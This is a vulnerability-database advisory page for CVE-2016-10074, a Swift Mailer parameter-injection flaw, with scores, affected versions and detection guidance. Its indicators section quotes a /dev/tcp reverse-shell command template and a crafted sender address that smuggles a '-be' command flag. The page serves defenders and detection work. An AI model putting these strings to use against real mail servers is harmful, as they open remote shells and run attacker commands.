cbcvebase.
CVE-2016-10074
published 2016-12-30

CVE-2016-10074: The mail transport (aka Swift_Transport_MailTransport) in Swift Mailer before 5.4.5 might allow remote attackers to pass extra parameters to the mail command…

PriorityP274critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
41.83%
98.5th percentile
The mail transport (aka Swift_Transport_MailTransport) in Swift Mailer before 5.4.5 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted e-mail address in the (1) From, (2) ReturnPath, or (3) Sender header.

Affected

4 ranges
VendorProductVersion rangeFixed in
debianlibphp-swiftmailer< libphp-swiftmailer 5.4.2-1.1 (bookworm)libphp-swiftmailer 5.4.2-1.1 (bookworm)
neosswiftmailer>= 0 < 5.4.55.4.5
swiftmailerswiftmailer<= 5.4.4
swiftmailerswiftmailer>= 0 < 5.4.55.4.5

Detection & IOCsextracted from sources · hover to see the quote

command/bin/bash -c '0/dev/tcp/%s/%s;nohup sh &196 2>&196 &'
command"a\' -be <cmd> "@a.co
command/dev/tcp/%s/%s 0&1'
  • Detect parameter injection in Swift Mailer by monitoring for backslash double-quote sequences (\" ) in the From, ReturnPath, or Sender email header fields, which are used to escape out of the mail() command argument and inject extra parameters.
  • Monitor outbound /dev/tcp shell connections spawned from web server processes (e.g., apache, php-fpm), which are indicative of successful exploitation resulting in a reverse shell.
  • Alert on Swift_Transport_MailTransport processing email addresses containing -be or other mail command flags, as these indicate attempted parameter injection via the From/ReturnPath/Sender headers.
  • ·The vulnerability only affects Swift Mailer versions before 5.4.5; upgrading to 5.4.5 or later fully remediates the issue. Detection rules targeting older versions should be scoped accordingly.
  • ·The exploit targets the PHP mail() function's fifth argument (-f flag) via Swift_Transport_MailTransport; environments using SMTP transport instead of the mail() transport are not affected by this specific attack vector.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
ghsa9.8CRITICAL
osv9.8CRITICAL
vendor_debian9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.